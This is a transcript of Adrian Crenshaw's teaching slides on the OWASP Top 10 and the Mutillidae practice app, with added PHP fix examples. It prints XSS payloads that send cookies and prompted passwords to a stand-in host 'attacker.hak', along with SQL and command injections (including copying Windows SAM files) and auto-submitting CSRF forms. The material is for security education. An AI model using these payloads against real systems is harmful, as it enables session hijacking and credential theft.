mutillidae and the owasp top 10 by adrian crenshaw aka irongeek

http://Irongeek.com Adrian Crenshaw

Upload: magno-logan

Post on 02-Jul-2015


TRANSCRIPT

Page 1: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek

http://Irongeek.com

Adrian Crenshaw

Page 2:

I run Irongeek.com

I have an interest in InfoSec education

I don't know everything - I'm just a geek with time on my hands

I'm also not a professional web developer, creating crappy code was easy for me.

So why listen to me? Sometimes it takes a noob to teach a noob.

Page 3:

OWASP Top 10: http://www.owasp.org/index.php/OWASP_Top_Ten_Project (As a side note, I've copied quite a few of their descriptions and fixes into this presentation)

Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Ok, but what are those?

Page 4:

The 2007 list includes:

A1 - Cross Site Scripting (XSS)

A2 - Injection Flaws

A3 - Malicious File Execution

A4 - Insecure Direct Object Reference

A5 - Cross Site Request Forgery (CSRF)

A6 - Information Leakage and Improper Error Handling

A7 - Broken Authentication and Session Management

A8 - Insecure Cryptographic Storage

A9 - Insecure Communications

A10 - Failure to Restrict URL Access

The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.

Page 5:

A teaching tool for illustrating the OWASP Top 10

Written in PHP/MySQL

Meant to be simpler than WebGoat

Simple to exploit, just to get the concept across

Easy to reset

Includes a “Tips” function to help the student

Page 6:

1. Download Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

2. Grab XAMPP Lite and install it: http://www.apachefriends.org/en/xampp.html

3. Put the Mutillidae files in \htdocs

4. You may want to edit xampplite\apache\conf\httpd.conf and set "Listen 127.0.0.1:80" so the deliberately vulnerable app is reachable only from the local machine.

Page 7:

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

Pages 8-9:

Simple: <script>alert("XSS");</script>

Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing: <script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>

Password Con: <script>username=prompt('Please enter your username',' ');password=prompt('Please enter your password',' ');document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");</script>

Page 10:

External Javascript: <script src="http://ha.ckers.org/xss.js"></script>

Hot BeEF Injection: <script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

How about the User Agent string?

Page 11:

Mangle XSS to bypass filters: http://ha.ckers.org/xss.html

BeEF browser exploitation framework: http://www.bindshell.net/tools/beef

XSS Me Firefox plugin: https://addons.mozilla.org/en-US/firefox/addon/7598

Exotic Injection Vectors: http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

Page 12:

Input validation.

Strong output encoding (in PHP, htmlspecialchars()).

Specify the output encoding (for example the charset in the Content-Type header) so the browser does not have to guess it.

Do not use "blacklist" validation to detect XSS in input or to encode output.

Watch out for canonicalization errors.
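An added example of the encoding fix, written for this page rather than taken from the slides or from Mutillidae: the unencoded reflection the Mutillidae pages do, beside htmlspecialchars() with the flags that matter, run over the payloads from the slides and a User-Agent value. The greetVulnerable/greetSafe/h function names and the constructed User-Agent string are mine; everything else is standard PHP.

```php
<?php
// Added example, not Mutillidae's code. Run from the command line: php xss.php
declare(strict_types=1);

// Vulnerable: what the Mutillidae pages do. Whatever the user typed (or sent
// in a header such as User-Agent) is written straight into the HTML.
function greetVulnerable(string $name): string
{
    return '<p>Hello ' . $name . '</p>';
}

// Fixed: encode for the HTML context.
//  - ENT_QUOTES also encodes the single quote, so the value is safe inside
//    single-quoted attributes, not only between tags.
//  - ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "" (an empty
//    result is a canonicalization trap: the "encoded" field silently vanishes).
//  - The charset argument must match what the page is served as (see below).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function greetSafe(string $name): string
{
    return '<p>Hello ' . h($name) . '</p>';
}

// "Specify the output encoding": state which charset the bytes are in, so the
// browser cannot sniff a charset in which some other byte sequence means "<".
// Only meaningful when serving over HTTP; a no-op on the command line.
function sendHtmlHeaders(): void
{
    if (PHP_SAPI !== 'cli' && !headers_sent()) {
        header('Content-Type: text/html; charset=UTF-8');
    }
}

sendHtmlHeaders();

// Payloads from the slides, plus a constructed User-Agent for the header case
// (the real header is used when the script runs under a web server).
$payloads = [
    'simple'     => '<script>alert("XSS");</script>',
    'redirect'   => '<script>window.location = "http://www.irongeek.com/"</script>',
    'user-agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0 <script>alert(1)</script>',
];

foreach ($payloads as $label => $p) {
    echo "[$label]\n";
    echo '  vulnerable: ', greetVulnerable($p), "\n";
    echo '  encoded:    ', greetSafe($p), "\n";
}

// htmlspecialchars() is the right encoder for HTML text and quoted attributes
// only. Inside a <script> block, a URL, or an unquoted attribute a different
// encoder (or refusing the value) is needed; encoding once for HTML does not
// cover those contexts.
```

The User-Agent entry is the answer to the "How about the User Agent string?" slide: request headers are user supplied too, and go through the same encoder before they are echoed back.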

Page 13:

Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

Page 14:

The Code:

"SELECT * FROM accounts WHERE username='" . $username . "' AND password='" . stripslashes($password) . "'"

or

echo shell_exec("nslookup " . $targethost);

Expected to fill in the string to:

SELECT * FROM accounts WHERE username='adrian' AND password='somepassword'

or

nslookup irongeek.com

But what if the person injected (a password of somepassword' or 1=1 -- , or a host of irongeek.com && del *.*):

SELECT * FROM accounts WHERE username='adrian' AND password='somepassword' or 1=1 -- '

or

nslookup irongeek.com && del *.*

Page 15:

Simple SQL Injection: ' or 1=1 --

Wish I could do this, but can't stack in MySQL/PHP: '; DROP TABLE owasp10; --

Command Injections:

&& dir

&& wmic process list

&& wmic useraccount list

&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak

(use ; as a separator if you are running this on Linux)

Page 16:

SQL Injection Cheat Sheet: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

SQL Injection Attacks by Example: http://unixwiz.net/techtips/sql-injection.html

Command Line Kung Fu: http://blog.commandlinekungfu.com/

Page 17:

Input validation.

Use strongly typed parameterized query APIs (bound parameters).

Enforce least privilege.

Avoid detailed error messages.

Show care when using stored procedures.

Do not use dynamic query interfaces.

Do not use simple escaping functions.

Watch out for canonicalization errors.
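An added example, written for this page and not taken from the slides or from Mutillidae: the slide's concatenated login query beside a bound-parameter version, both fed the ' or 1=1 -- password, and the nslookup command with an "accept known good" check in front of the shell. It uses PDO with an in-memory SQLite database so no MySQL server is needed (SQLite also treats -- as a comment, so the injection behaves as on the slide). The function names, the constructed account row and the hostname regex are mine.

```php
<?php
// Added example, not Mutillidae's code. Run: php inject.php (needs pdo_sqlite)
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (username TEXT, password TEXT)');
// Constructed row. The plain-text password only mirrors the slide's query;
// real code stores password_hash() output and checks it with password_verify().
$db->exec("INSERT INTO accounts VALUES ('adrian', 'somepassword')");

// Vulnerable: the slide's query. stripslashes() actively removes any escaping,
// so a quote in $password becomes SQL syntax.
function loginVulnerable(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT * FROM accounts WHERE username='" . $username
         . "' AND password='" . stripslashes($password) . "'";
    return $db->query($sql)->fetch() !== false;
}

// Fixed: bound parameters. The values travel separately from the query text,
// so a quote in $password is data and can never change the WHERE clause.
function loginSafe(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT 1 FROM accounts WHERE username = ? AND password = ?');
    $stmt->execute([$username, $password]);
    return $stmt->fetch() !== false;
}

// The slide's password: the quote closes the literal, "or 1=1" matches every
// row, and "--" comments out the closing quote the code appends.
$injected = "' or 1=1 --";
printf("vulnerable login, injected password:     %s\n", loginVulnerable($db, 'adrian', $injected) ? 'granted' : 'denied');
printf("parameterized login, injected password:  %s\n", loginSafe($db, 'adrian', $injected) ? 'granted' : 'denied');
printf("parameterized login, real password:      %s\n", loginSafe($db, 'adrian', 'somepassword') ? 'granted' : 'denied');

// Command injection: the slide's shell_exec("nslookup " . $targethost).
// Build the command only from an "accept known good" hostname.
function lookupCommand(string $targethost): string
{
    // Hostname characters only; "&&", ";", "|", spaces and quotes are all
    // rejected before anything reaches a shell.
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $targethost)) {
        throw new InvalidArgumentException('not a hostname: ' . $targethost);
    }
    // Defense in depth: quote it anyway, so the shell sees exactly one argument.
    return 'nslookup ' . escapeshellarg($targethost);
}

foreach (['irongeek.com', 'irongeek.com && dir', 'irongeek.com; cat /etc/passwd'] as $host) {
    try {
        echo lookupCommand($host), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The validator, not escapeshellarg(), is the fix: escaping alone is the "simple escaping function" the fix list warns against, and it does nothing about a hostname argument that nslookup itself would misinterpret. The same rule applies to the SQL half: the prepared statement is the fix, and the least-privilege item on the fix list (a database account that cannot DROP tables) limits what an injection you missed can do.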

Page 18:

Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

Page 19:

Grabbing a local file: http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc

Tamper Data, POST data and an inadvertent proxy

Page 20:

Tamper Data Firefox Plugin: https://addons.mozilla.org/en-US/firefox/addon/966

Paros: http://www.parosproxy.org/index.shtml

WebScarab: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

Page 21:

Strongly validate user input using "accept known good" as a strategy

Add firewall rules to prevent web servers making new connections to external web sites and internal systems.

Consider implementing a chroot jail or other sand box mechanisms.

PHP: Disable allow_url_fopen and allow_url_include in php.ini, and consider building PHP locally without this functionality.

PHP: Disable register_globals and use E_STRICT to find uninitialized variables.

PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.

Page 22:

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

Page 23:

You already saw it with the malicious file include demo.

Page 24:

Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.

Validate any private object references extensively with an "accept known good" approach.

Verify authorization to all referenced objects.
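An added example, written for this page and not taken from the slides or from Mutillidae, covering the file-inclusion fixes (Page 21) and the direct-object-reference fixes (Page 24) together, since the same "accept known good" rule fixes both: the page parameter becomes a key into an allow-list instead of a path, a real file name is confined to one directory, and a record id from the URL is checked against the logged-in user before the row is returned. The PAGES table, the function names, home.php and the $rows data are mine; only add-to-your-blog.php and the index.php?page= / php_file_name= parameters are from the slides.

```php
<?php
// Added example, not Mutillidae's code. Run: php include.php
// Replaces the pattern behind index.php?page=... and php_file_name=...:
//     include $_GET['page'];          // attacker picks any local or remote file
// For the remote half of the problem the php.ini settings from the fix list
// still apply (register_globals itself no longer exists as of PHP 5.4):
//     allow_url_fopen = Off
//     allow_url_include = Off
declare(strict_types=1);

// 1. Allow-list: the only pages index.php will include. The user-supplied value
//    is looked up as a key; it is never used as a path.
const PAGES = [
    'home'     => 'home.php',              // hypothetical page name
    'add-blog' => 'add-to-your-blog.php',  // page name from the slides
];

function resolvePage(string $requested): string
{
    if (!array_key_exists($requested, PAGES)) {
        throw new RuntimeException('unknown page');
    }
    return PAGES[$requested];
}

// 2. When a real file name is unavoidable (the source viewer), confine it:
//    drop any directory part, resolve symlinks and "..", and confirm the result
//    still lies under the base directory. basename('..') is '..', which is why
//    the prefix check after realpath() is needed as well.
function resolveSourceFile(string $baseDir, string $name): string
{
    $base = realpath($baseDir);
    $candidate = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . basename($name));
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('file not available');
    }
    return $candidate;
}

// 3. Direct object reference: the blog entry id comes from the URL, so the row
//    is released only if the logged-in user owns it. One error text for "no such
//    id" and "not yours", so the check cannot be used to enumerate ids.
function fetchOwnBlogEntry(array $rows, int $currentUser, int $id): array
{
    if (!isset($rows[$id]) || $rows[$id]['owner'] !== $currentUser) {
        throw new RuntimeException('not found');
    }
    return $rows[$id];
}

// Demo with the slides' attack inputs
foreach (['add-blog', '../config.inc', 'http://attacker.hak/shell.txt'] as $req) {
    try {
        echo $req, ' -> ', resolvePage($req), "\n";
    } catch (RuntimeException $e) {
        echo $req, ' -> ', $e->getMessage(), "\n";
    }
}
foreach ([basename(__FILE__), '../../etc/passwd', '..'] as $name) {
    try {
        echo $name, ' -> ', resolveSourceFile(__DIR__, $name), "\n";
    } catch (RuntimeException $e) {
        echo $name, ' -> ', $e->getMessage(), "\n";
    }
}
// Constructed stand-in for the blog table: id => [owner, text]
$rows = [1 => ['owner' => 7, 'text' => 'hi there monkeyboy'], 2 => ['owner' => 9, 'text' => 'someone else']];
foreach ([1, 2, 3] as $id) {
    try {
        echo "user 7 reads id $id -> ", fetchOwnBlogEntry($rows, 7, $id)['text'], "\n";
    } catch (RuntimeException $e) {
        echo "user 7 reads id $id -> ", $e->getMessage(), "\n";
    }
}
```

resolvePage() is the form to prefer: with an allow-list the attacker never supplies a file name at all, so neither traversal nor a remote URL has anything to act on. resolveSourceFile() is the fallback for the case where the file name genuinely must come from the request.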

Page 25:

A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

Page 26:

CSRF flow (diagram on the slide): three parties, the Client (the victim's browser), the Target Web App, and a Website the attacker controls.

1. Session established with the web app via a cookie (already logged in).

2. At some later point, content that the attacker controls is requested.

3. Attacker serves up content that asks the client's browser to make a request.

4. Client makes the request, and since it already has a session cookie the request is honored.

Page 27:

Let's visit a page with this lovely link:

<img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">

Don't want to use a bad image? Try an iframe:

<iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>

Can't use the GET method? Try something like:

<html> <body><form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"><input type='hidden' name='input_from_form' value="Test of auto submitted form."></form><script>document.csrfform.submit()</script> </body></html>

Page 28:

CSRF Flaws Found On Major Websites, Including a Bank: http://it.slashdot.org/article.pl?sid=08/09/30/0136219

CSRF Home Router Fun: http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/

CSRF in Gmail: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

Page 29:

For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.

Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)

POST alone is insufficient protection.

Consider adding Captchas and extra session values as hidden form elements.
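An added example of the "extra session value as a hidden form element" fix, written for this page and not taken from the slides or from Mutillidae: a per-session synchronizer token on the add-to-your-blog.php form, checked with hash_equals(), with the slide's three attack vectors replayed against it. $session stands in for $_SESSION so the functions can be run from the command line; the function names and the constructed requests are mine.

```php
<?php
// Added example, not Mutillidae's code. Run: php csrf.php
declare(strict_types=1);

const TOKEN_KEY = 'csrf_token';

// Issue one unguessable token per session and embed it in every
// state-changing form as a hidden field.
function csrfToken(array &$session): string
{
    if (empty($session[TOKEN_KEY])) {
        $session[TOKEN_KEY] = bin2hex(random_bytes(32));
    }
    return $session[TOKEN_KEY];
}

function blogForm(array &$session): string
{
    $t = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php?page=add-to-your-blog.php">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<textarea name="input_from_form"></textarea>'
         . '<input type="submit" value="Save Blog Entry"></form>';
}

// Accept the post only if (a) it is a POST, so the <img>/<iframe> GET vectors
// fail outright, and (b) the submitted token matches the session's. An
// attacker's page cannot read the victim's token (same-origin policy), so an
// auto-submitting form from another site has nothing to put in the field.
// hash_equals() compares in constant time.
function acceptBlogPost(array &$session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[TOKEN_KEY] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    return true;
}

// Demo with a constructed session
$session = [];
echo blogForm($session), "\n";

$cases = [
    'slide <img>/<iframe> GET'        => ['GET',  ['input_from_form' => 'hi there monkeyboy']],
    'slide auto-submitted POST form'  => ['POST', ['input_from_form' => 'Test of auto submitted form.', 'csrf_token' => 'guess']],
    'genuine submission of the form'  => ['POST', ['input_from_form' => 'real entry', 'csrf_token' => $session[TOKEN_KEY]]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-32s -> %s\n", $label, acceptBlogPost($session, $method, $post) ? 'accepted' : 'rejected');
}
```

The token is what makes "POST alone is insufficient" concrete: the attacker's page on the slide can submit a POST, but it cannot fill in a value it has no way to read. Re-authentication or transaction signing, the first item on the fix list, is still the stronger control for high-value actions, since a token does not help if the attacker already has script running in the victim's session via XSS.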

Page 30:

Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security

Page 31:

SamuraiWTF: http://samurai.inguardians.com/

OWASP Live CD: http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

BackTrack: http://www.remote-exploit.org/backtrack.html

Page 32:

Free ISSA classes

ISSA Meeting: http://issa-kentuckiana.org/

Louisville Infosec: http://www.louisvilleinfosec.com/

Phreaknic/Notacon/Outerz0ne: http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/

Page 33:

42